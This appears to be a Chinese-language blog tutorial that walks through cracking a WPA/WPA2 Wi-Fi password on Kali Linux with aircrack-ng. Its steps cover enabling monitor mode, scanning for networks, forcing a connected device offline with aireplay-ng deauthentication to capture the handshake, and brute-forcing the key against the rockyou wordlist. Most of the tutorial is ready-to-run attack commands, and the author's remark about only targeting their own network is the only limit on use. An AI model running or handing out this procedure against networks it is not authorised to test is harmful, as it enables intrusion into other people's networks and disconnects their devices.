首先先說一下原理吧,就是通過設備與路由器之間的數據包來獲得所需要的秘鑰,然后在用aircrack+字典跑破。所以說運氣與好字典是很重要的。關於字典可以自己做或者下載做好的。廢話不多說,開始。
第一步:當你沒有字典時,你可以用kali里自帶的字典包。那個字典包我看來,破解個弱口令是可以的。
打開終端:
輸入 gzip -d /usr/share/wordlists/rockyou.txt.gz
解壓目錄下的字典文件,如果解壓了直接跳過好了。
第二步:
執行
airmon-ng
這一步是列出支持監控模式的無線網卡。如果沒有東西的話說明你的無線網卡不支持監控模式,買一個usb網卡插上吧。
這一步我忘截圖了重要點就是記住Interface那欄下面的,大部分都是wlan0,如果插上usb網卡,會分配為wlan1等。
第三步:
執行
airmon-ng start 網卡名
網卡名就打你獲得的,比如 airmon-ng start wlan0
這一步是打開網卡的監聽模式,然后會發現wifi斷掉是很正常的現象,等關閉監聽模式就可以恢復。或者init6重啟也可以解決。
這一步我也忘記截圖了。不過首先明白分配的網卡端口不是第三步的網卡名,分配的網卡端口是,找到這一行(倒數第二行) monitor mode vif enable for[phy0]wlan0 on [phy0]wlan0mon 可能會有所不同,但大部分是一樣的。在最后面wlan0mon,這個就是分配的網卡接口。使用成功可以用ifconfig查看(跟win下的config不 一樣)
第四步:
執行:
airodump-ng 分配的網卡端口
這一步就是查看目前你網卡能夠搜到wifi。
圖:
此時你要選擇破解的wifi並記住,兩個值BSSID和CH 。(我是好孩子不干壞事所以我就選擇破解自己家的wifi)。
Netcore CH是6 BSSID是前面那一塊不打了。並且不要將這個關閉,所以要重新開一個終端。否則無法獲得握手包。
在這里也有許多人發現了為什么我沒下面那一部分。那一部分是說明曾經連接過的wifi里面的設備。具體請看下一步。//看不懂可以掠過這一行
第五步:
執行:
airodump-ng -c [CH] --bssid [BSSID] -w ~/ [分配網卡端口]
這一步要在[ ]中添的我在上面說了。大家就按照這個模式輸入好了。(注意不要把[ ]打上,例如:airodump-ng -c 6 --bssid ……)如圖:
第六步:
獲取握手包,不多說,執行:
aireplay-ng -0 2 -a [BSSID] -c [STATION] [分配的網卡端口]
station就是從下面第二列中挑選一個來選擇,功能是把這個設備打下線去,然后重連的時候獲得握手包。
如果成功的話,則會在第五步右上角出現handcap啥的(好像是這么拼)。
第七步(可執行也可不執行):
關閉監聽:
airmon-ng stop [分配的網卡端口]
第八步:
跑字典咯。
aircrack-ng -a2 -b [BSSID] -w /usr/share/wordlists/rockyou.txt ~/*.cap
-w 后面那一部分換成字典的路徑,上面給出的是自帶的密碼路徑跟密碼包。在右面的是你握手包的路徑。當然握手包的路徑改寫,實在上面代碼中,我想你應該會改寫。
成功的話。就會KEY FOUND!圖:
注:如果大家有在第五步時並沒有發現STATION,不要悲傷不要心急,是你的網卡頻率不行,遇到這種情況請果斷買一個usb無線網卡,畢竟早晚都要買的。我的筆記本7年了,當時就出現這種情況,我用了360wifi的網卡就好用了。